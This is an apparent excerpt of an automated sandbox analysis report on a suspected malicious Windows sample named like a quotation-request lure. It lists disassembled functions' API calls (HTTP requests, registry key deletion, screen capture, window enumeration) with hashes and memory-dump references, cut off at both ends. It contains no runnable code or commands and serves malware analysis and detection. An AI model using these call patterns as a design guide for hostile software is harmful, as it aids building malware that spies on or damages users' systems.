                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F8C554
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F8C584
                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F8C5DC
                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F8C5F0
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00F8C5FB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                    • Opcode ID: aeee401ef33e8ee53f15c09bde4b998086b4d68e82897db1d934c44bf284eb1c
                                                                                                                    • Instruction ID: bcc23adbcd20926d470808f06b6f1afd02702e98ea715769a6be0f6594e25456
                                                                                                                    • Opcode Fuzzy Hash: aeee401ef33e8ee53f15c09bde4b998086b4d68e82897db1d934c44bf284eb1c
                                                                                                                    • Instruction Fuzzy Hash: FF513BB1500609BFDB21AF64CD88AAB7BFCFF09754F04442AF9459A650DB34E944ABF0
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00FA8592
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85A2
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85AD
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85BA
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00FA85C8
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85D7
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00FA85E0
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85E7
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FA85F8
                                                                                                                    • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00FAFC38,?), ref: 00FA8611
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00FA8621
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00FA8641
                                                                                                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00FA8671
                                                                                                                    • DeleteObject.GDI32(?), ref: 00FA8699
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FA86AF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    • Opcode ID: 710bf5596f95c80a35f809ee23af0078d98b6bfaf0666e47b141bc7ccaf27f45
                                                                                                                    • Instruction ID: 4c809e1f8b512b85dd920138534b330748d67773749694eac6e11125a1b57655
                                                                                                                    • Opcode Fuzzy Hash: 710bf5596f95c80a35f809ee23af0078d98b6bfaf0666e47b141bc7ccaf27f45
                                                                                                                    • Instruction Fuzzy Hash: 9A41EBB5A00208AFDB11DFA5DC48EAA7BB8FF8A765F144158F905E7260DB709D01EB60
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00F81502
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00F8150B
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F81517
                                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F815FB
                                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00F81657
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00F81708
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00F8178C
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F817D8
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F817E7
                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00F81823
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                    • API String ID: 1234038744-3931177956
                                                                                                                    • Opcode ID: d7e55b6c5490dbfbb6c29e02a98db9b04e69b73bbecc6ac3619476f305072768
                                                                                                                    • Instruction ID: 9558716078b4b187d2938dde49a0e726e681bb3f0f7aff386e9dc3ed60b2db6f
                                                                                                                    • Opcode Fuzzy Hash: d7e55b6c5490dbfbb6c29e02a98db9b04e69b73bbecc6ac3619476f305072768
                                                                                                                    • Instruction Fuzzy Hash: 55D11472A00115DBCB10AF65E885BFDB7B9BF46700F18825AE846AF180DB34DC46FB91
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9B6AE,?,?), ref: 00F9C9B5
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9C9F1
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA68
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA9E
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9B6F4
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9B772
                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00F9B80A
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F9B87E
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F9B89C
                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00F9B8F2
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F9B904
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F9B922
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F9B983
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F9B994
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 146587525-4033151799
                                                                                                                    • Opcode ID: 1988f5f07aba38e2512b696c4a092746529ad43678ecce1d2c044fe081908d87
                                                                                                                    • Instruction ID: 47c9103f6c652a056837ee1600acc4f7460a1bf8ac615f2ec68c183d3e6c0385
                                                                                                                    • Opcode Fuzzy Hash: 1988f5f07aba38e2512b696c4a092746529ad43678ecce1d2c044fe081908d87
                                                                                                                    • Instruction Fuzzy Hash: F7C1B130608201AFEB14DF14D994F2ABBE1FF84314F14855CF5598B2A2CB75EC86EB91
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 00F925D8
                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F925E8
                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00F925F4
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00F92601
                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F9266D
                                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F926AC
                                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F926D0
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00F926D8
                                                                                                                    • DeleteObject.GDI32(?), ref: 00F926E1
                                                                                                                    • DeleteDC.GDI32(?), ref: 00F926E8
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00F926F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                    • Opcode ID: 93b2b95bc0343ce0438e261be0b4ea3c89541edefcc58d251ee708ecfb3ea9bd
                                                                                                                    • Instruction ID: 3c4fb677ca0d80825175077d6b9566ecd8918bc7780883f20fda1b975b90b2a0
                                                                                                                    • Opcode Fuzzy Hash: 93b2b95bc0343ce0438e261be0b4ea3c89541edefcc58d251ee708ecfb3ea9bd
                                                                                                                    • Instruction Fuzzy Hash: D161D1B5E00219EFDF05CFA4D884AAEBBB5FF48310F208529E955A7250E774A941DFA0
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00F4DAA1
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D659
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D66B
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D67D
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D68F
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6A1
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6B3
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6C5
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6D7
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6E9
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6FB
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D70D
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D71F
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D731
                                                                                                                    • _free.LIBCMT ref: 00F4DA96
                                                                                                                      • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
                                                                                                                      • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
                                                                                                                    • _free.LIBCMT ref: 00F4DAB8
                                                                                                                    • _free.LIBCMT ref: 00F4DACD
                                                                                                                    • _free.LIBCMT ref: 00F4DAD8
                                                                                                                    • _free.LIBCMT ref: 00F4DAFA
                                                                                                                    • _free.LIBCMT ref: 00F4DB0D
                                                                                                                    • _free.LIBCMT ref: 00F4DB1B
                                                                                                                    • _free.LIBCMT ref: 00F4DB26
                                                                                                                    • _free.LIBCMT ref: 00F4DB5E
                                                                                                                    • _free.LIBCMT ref: 00F4DB65
                                                                                                                    • _free.LIBCMT ref: 00F4DB82
                                                                                                                    • _free.LIBCMT ref: 00F4DB9A
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 98cb1cca28a579ec4e89b6ef746939aaa3ca7305ddcf4104131d6788a87851f0
• Instruction ID: 3586ab857309f4f7c1fc4e4ec15b1812f4078a282f56a6db7b615af6952802d6
• Opcode Fuzzy Hash: 98cb1cca28a579ec4e89b6ef746939aaa3ca7305ddcf4104131d6788a87851f0
• Instruction Fuzzy Hash: A7314C31A046059FEB61AA39EC45B567FE9FF40320F55442AF849D7292DB39AC40F720
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00F7369C
• _wcslen.LIBCMT ref: 00F736A7
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F73797
• GetClassNameW.USER32(?,?,00000400), ref: 00F7380C
• GetDlgCtrlID.USER32(?), ref: 00F7385D
• GetWindowRect.USER32(?,?), ref: 00F73882
• GetParent.USER32(?), ref: 00F738A0
• ScreenToClient.USER32(00000000), ref: 00F738A7
• GetClassNameW.USER32(?,?,00000100), ref: 00F73921
• GetWindowTextW.USER32(?,?,00000400), ref: 00F7395D
Strings
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
• String ID: %s%u
• API String ID: 4010501982-679674701
• Opcode ID: 5b31abe479d85b9d3c6f29eb3c1e498d7df95fc91c6f43f401aac517f5accc27
• Instruction ID: 5aba6cb1e8da2b7ea95e06d04d3097334557eb05928f02055ecc0d6331b60262
• Opcode Fuzzy Hash: 5b31abe479d85b9d3c6f29eb3c1e498d7df95fc91c6f43f401aac517f5accc27
• Instruction Fuzzy Hash: FA91B671604606BFD718DF24C885FAAB7A9FF44360F00C52AF99DD2190DB34EA45EB92
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00F74994
• GetWindowTextW.USER32(?,?,00000400), ref: 00F749DA
• _wcslen.LIBCMT ref: 00F749EB
• CharUpperBuffW.USER32(?,00000000), ref: 00F749F7
• _wcsstr.LIBVCRUNTIME ref: 00F74A2C
• GetClassNameW.USER32(00000018,?,00000400), ref: 00F74A64
• GetWindowTextW.USER32(?,?,00000400), ref: 00F74A9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 00F74AE6
• GetClassNameW.USER32(?,?,00000400), ref: 00F74B20
• GetWindowRect.USER32(?,?), ref: 00F74B8B
Strings
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: 887ff62c3b5ff38d3f23cdee06d0e9ca49daacddad7b730afafa49b2ce36e52d
• Instruction ID: 0880e17c5a7f4c028f3155a1708d3f008fa03360c9947a13c3ccfb27fbdb8c0f
• Opcode Fuzzy Hash: 887ff62c3b5ff38d3f23cdee06d0e9ca49daacddad7b730afafa49b2ce36e52d
• Instruction Fuzzy Hash: 0491B1714082059FDB05DF14C981FAA77E8FF84324F04846AFD899A196DB34FD45EBA2
APIs
  • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FA8D5A
• GetFocus.USER32 ref: 00FA8D6A
• GetDlgCtrlID.USER32(00000000), ref: 00FA8D75
• DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00FA8E1D
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00FA8ECF
• GetMenuItemCount.USER32(?), ref: 00FA8EEC
• GetMenuItemID.USER32(?,00000000), ref: 00FA8EFC
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00FA8F2E
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FA8F70
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FA8FA1
Strings
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
• String ID: 0
• API String ID: 1026556194-4108050209
• Opcode ID: 2fd408994034c72cc46a36480459196d520cfcb3f530d1da9124777319d48595
• Instruction ID: 42afa3136917475aa12328e2f702b8987ad22f2b7ac3855cbc9a448102c64540
• Opcode Fuzzy Hash: 2fd408994034c72cc46a36480459196d520cfcb3f530d1da9124777319d48595
• Instruction Fuzzy Hash: D881A4B19043059FDB10CF14DC84AAB7BE9FF8A3A4F14051DF98597291DBB4D902EBA1
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F7DC20
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F7DC46
• _wcslen.LIBCMT ref: 00F7DC50
• _wcsstr.LIBVCRUNTIME ref: 00F7DCA0
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F7DCBC
Strings
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1939486746-1459072770
• Opcode ID: 598da1636c74493b9407d0738e25ccbadbbebc60627cf4fc1373ab6896e5b182
• Instruction ID: 6b0ed2965f2e6405f05533485c59f8f3679a42ecbfec8e67d71d21a083cd9119
• Opcode Fuzzy Hash: 598da1636c74493b9407d0738e25ccbadbbebc60627cf4fc1373ab6896e5b182
• Instruction Fuzzy Hash: E14134729402157ADB15A770EC43EBF37BCEF42760F14406AF904E6182EB79E901B7A6
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F9CC64
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00F9CC8D
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F9CD48
  • Part of subcall function 00F9CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00F9CCAA
  • Part of subcall function 00F9CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00F9CCBD
  • Part of subcall function 00F9CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F9CCCF
  • Part of subcall function 00F9CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F9CD05
  • Part of subcall function 00F9CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F9CD28
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00F9CCF3
Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                                    • Opcode ID: b82069c6fdd9f5c61a31fbdb1b0740f6ad0c8fe68e6c6918f4445b93b8833f77
                                                                                                                    • Instruction ID: e8554f296e45f2a20230f9b58194ec5fe7f354c412c65bd1c687b791bb5f6e82
                                                                                                                    • Opcode Fuzzy Hash: b82069c6fdd9f5c61a31fbdb1b0740f6ad0c8fe68e6c6918f4445b93b8833f77
                                                                                                                    • Instruction Fuzzy Hash: CC317CB1E0112CBBEB219B51DC88EFFBB7CEF46754F000166E915E2240DA349A45BAE0
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F83D40
• _wcslen.LIBCMT ref: 00F83D6D
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00F83D9D
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F83DBE
• RemoveDirectoryW.KERNEL32(?), ref: 00F83DCE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F83E55
• CloseHandle.KERNEL32(00000000), ref: 00F83E60
• CloseHandle.KERNEL32(00000000), ref: 00F83E6B
Strings
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
• Opcode ID: 2aa84ec1d4ec72200868d37879f6a93b07a99ffa0ddbf0086382671babf27f1e
• Instruction ID: 483b35fc86122e7f95dc493a6c9c56d4d64b9fd2ddd0f1dae65efea304916fcf
• Opcode Fuzzy Hash: 2aa84ec1d4ec72200868d37879f6a93b07a99ffa0ddbf0086382671babf27f1e
• Instruction Fuzzy Hash: 0E31B4B290021DABDB21ABA0DC49FEF37BCEF89B10F1040B5F505D6160EB7497459B64
APIs
• timeGetTime.WINMM ref: 00F7E6B4
  • Part of subcall function 00F2E551: timeGetTime.WINMM(?,?,00F7E6D4), ref: 00F2E555
• Sleep.KERNEL32(0000000A), ref: 00F7E6E1
• EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00F7E705
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F7E727
• SetActiveWindow.USER32 ref: 00F7E746
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F7E754
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00F7E773
• Sleep.KERNEL32(000000FA), ref: 00F7E77E
• IsWindow.USER32 ref: 00F7E78A
• EndDialog.USER32(00000000), ref: 00F7E79B
Strings
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: f2763c31184d8c95fda7ce35813934990032b0447ea36d0cdf558e1d4b858ccb
• Instruction ID: 2c66ca367aed65fd7ec69a7dd8f94155daf91080069e576fc7531ff70edfed6a
• Opcode Fuzzy Hash: f2763c31184d8c95fda7ce35813934990032b0447ea36d0cdf558e1d4b858ccb
• Instruction Fuzzy Hash: 0C21A4B120024CAFEF005F24ECC9E253B6DF759358B148467F51D862B1EBB5AC00BA66
APIs
  • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F7EA5D
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F7EA73
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F7EA84
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F7EA96
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F7EAA7
Strings
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
• Opcode ID: 6bf895d6d081a24fc49851440b9e77828dbbf6678a83cd7247805dbbc7993ea3
• Instruction ID: ae21b7e5d1488ad26d033c179f5202062688c5dd07dc995aa7644f9405788e2a
• Opcode Fuzzy Hash: 6bf895d6d081a24fc49851440b9e77828dbbf6678a83cd7247805dbbc7993ea3
• Instruction Fuzzy Hash: 2B11A331A5021979E720A7A1DC5ADFF7B7CEBD5B10F44042BB811E20D0EEB45945E5B3
APIs
• GetDlgItem.USER32(?,00000001), ref: 00F75CE2
• GetWindowRect.USER32(00000000,?), ref: 00F75CFB
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F75D59
• GetDlgItem.USER32(?,00000002), ref: 00F75D69
• GetWindowRect.USER32(00000000,?), ref: 00F75D7B
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F75DCF
• GetDlgItem.USER32(?,000003E9), ref: 00F75DDD
• GetWindowRect.USER32(00000000,?), ref: 00F75DEF
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F75E31
• GetDlgItem.USER32(?,000003EA), ref: 00F75E44
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F75E5A
• InvalidateRect.USER32(?,00000000,00000001), ref: 00F75E67
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: dd5fc85f656487f4b9a02a602d2ffca6d2b86695b3b6e4037111fb564d465db0
• Instruction ID: 20723c6aa33528cb24800145e60f7196820ce517b93f52c40a2d7e1aeea0d83e
• Opcode Fuzzy Hash: dd5fc85f656487f4b9a02a602d2ffca6d2b86695b3b6e4037111fb564d465db0
• Instruction Fuzzy Hash: 3151FDB1E00609AFDF18CF68DD89AAEBBB5FB48710F148129F519E7290D7709E04DB91
APIs
  • Part of subcall function 00F28F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F28BE8,?,00000000,?,?,?,?,00F28BBA,00000000,?), ref: 00F28FC5
• DestroyWindow.USER32(?), ref: 00F28C81
• KillTimer.USER32(00000000,?,?,?,?,00F28BBA,00000000,?), ref: 00F28D1B
• DestroyAcceleratorTable.USER32(00000000), ref: 00F66973
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F28BBA,00000000,?), ref: 00F669A1
